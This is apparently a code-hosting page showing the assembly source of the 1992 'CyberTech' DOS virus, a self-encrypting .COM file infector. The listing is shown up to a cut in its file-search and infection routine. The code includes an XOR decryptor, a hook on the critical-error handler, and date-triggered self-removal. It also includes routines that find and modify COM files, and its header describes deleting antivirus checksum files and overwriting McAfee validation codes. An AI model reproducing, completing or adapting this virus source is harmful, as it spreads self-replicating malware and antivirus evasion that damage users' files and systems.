📄 cybertch.asm
字号:
;
; CyberTech Virus - Strain A John Tardy (C) 1992
;
; Written in A86 V3.22
;
; Description : This is a Non-Resident Self-Encrypting .COM file infector
; which infects COM files in the current directory. It will
; remove CHKLIST.CPS from the current directory after it has
; infected a program. CHKLIST.CPS is a file which is used by
; VDEFEND of PCSHELL and Central Point AntiVirus. When a
; validation code is added by SCAN of McAfee, it will overwrite
; the code, so the file is no longer CRC protected anymore.
; After 1992, the virus activated. It then displays a message
; that your system has been infected. The virus will remove
; itself from the infected file and completely restore it. If
; a validation code was added, it is lost, but the file is not
; corrupted and will function normally. Even when the file is
; compressed afterwards by an executable file compressor, it is
; uncompressed. Before 1993, the virus sometimes display it's
; copyright. This is caused when the random encryption counter
; is a 0. It will redefine it, so there is no visible text in
; the virus. It checks also if there is enough diskspace
; aveable and installs a critical error handler.
;
Org 0h ; Generate .BIN file
Start: Jmp MainVir ; Jump to decryptor code at EOF
Db '*' ; Virus signature (very short)
;
; Decryptor procedure
;
MainVir: Call On1 ; Push offset on stack
On1: Pop BP ; Calculate virus offset
Sub BP,Offset MainVir+3 ;
Push Ax ; Save possible error code
Lea Si,Crypt[BP] ; Decrypt the virus with a
Mov Di,Si ; very simple exclusive or
Mov Cx,CryptLen ; function.
Decrypt: Lodsb ;
Xor Al,0 ;
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Length of the decryptor
;
; Main initialization procedure
;
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at
Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com)
Mov Cs:Start+100h,Ax ;
Mov Cs:Start[2]+100h,Bx ;
Xor Ax,Ax ; Get original interrupt 24
Push Ax ; (critical error handler)
Pop Ds ;
Mov Bx,Ds:[4*24h] ;
Mov Es,Ds:[4*24h]+4 ;
Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place
Mov Word Ptr Cs:OldInt24+2[Bp],Es ;
Lea Bx,NewInt24[Bp] ; Install own critical error
Push Cs ; handler to avoid messages
Pop Es ; when a disk is write
Mov Word Ptr Ds:[4*24h],Bx ; protected and such things
Mov Word Ptr Ds:[4*24h]+2,Es ;
Push Cs ;
Pop Ds ;
Mov Ah,30h ; Check if DOS version is
Int 21h ; 3.0 or above for correct
Cmp Al,3 ; interrupt use
Jae On2 ;
Jmp Ready ;
On2: Mov Ax,3600h ; Check if enough disk space
Xor Dx,Dx ; is aveable for infecting
Int 21h ; (3 clusters should be
Cmp Bx,3 ; enough i think)
Ja TestDate ;
Jmp Ready ;
TestDate: Mov Ah,2ah ; Check if 1992 is past time
Int 21h ; already
Cmp Cx,1993 ;
Jae Clean ; - 1993 or more
Jmp NoClean ; - Not 1993 or more
;
; Main Cleanup procedure
;
Clean: Push Cs ; Show message that the
Pop Ds ; system has been infected
Mov Ah,9 ;
Lea Dx,Removed[Bp] ;
Int 21h ;
Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fd00h ;
Int 21h ;
Mov Ax,Cs:[2ch] ; Find the name of the
Mov Ds,Ax ; program that is now
Mov Si,0 ; executed (me must search in
Mov Cx,4000h ; the DOS environment for
Seeker: Lodsb ; safe tracking of the name
Cmp Al,1 ;
Je On3 ;
Loop Seeker ;
On3: Inc Si ; Transfer the found name
Push Cs ; to a safe address in memory
Pop Es ;
Mov Di,0fd80h ;
Mov Cx,80h ;
Trans: Lodsb ;
Cmp Al,0h ;
Jne Verder ;
Xor Ax,Ax ;
Verder: Stosb ;
Loop Trans ;
Push Cs ; Read file attributes and
Pop Ds ; check if an error has
Mov Ax,4300h ; occured
Mov Dx,0fd80h ;
Int 21h ;
Jnc DeInfect ; - No error, DeInfect
Jmp Ready ; - Error, Ready
DeInfect: Push Cx ; Store old file attributes
Mov Ax,4301h ; Clear file attributes
Xor Cx,Cx ; (for read only etc.)
Int 21h ;
Mov Ax,3d02h ; Open the file
Int 21h ;
Mov Bx,Ax ; Read file date/time stamp
Mov Ax,5700h ; and store it on the stack
Int 21h ; for later use
Push Cx ;
Push Dx ;
Mov Ah,3eh ; Close file
Int 21h ;
Mov Dx,0fd80h ; Create a new file with the
Xor Cx,Cx ; same name
Mov Ah,3ch ;
Int 21h ;
Mov Bx,Ax ; store file handle in BX
Mov Ah,40h ; write memory image of host
Mov Dx,100h ; program to file (the original
Mov Cx,Bp ; file is now back again)
Sub Cx,0fch ;
Int 21h ;
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Pop Cx ; restore file attributes
Mov Ax,4301h ;
Mov Dx,0fd80h ;
Int 21h ;
Push Cs ; jump to ready routine
Pop Ds ; (shutdown of the virus)
Jmp Ready ;
;
; Main viral part
;
NoClean: Mov Ah,1ah ; Store DTA at safe place
Mov Dx,0fd00h ;
Int 21h ;
Mov Ah,4eh ; FindFirsFile Function
Search: Lea Dx,FileSpec[BP] ; Search for filespec given
Xor Cx,Cx ; in FileSpec adress
Int 21h ;
Jnc Found ; Found - Found
Jmp Ready ; Not Found - Ready
Found: Mov Ax,4300h ; Get file attributes and
Mov Dx,0fd1eh ; store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; clear file attributes
Xor Cx,Cx ;
Int 21h ;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -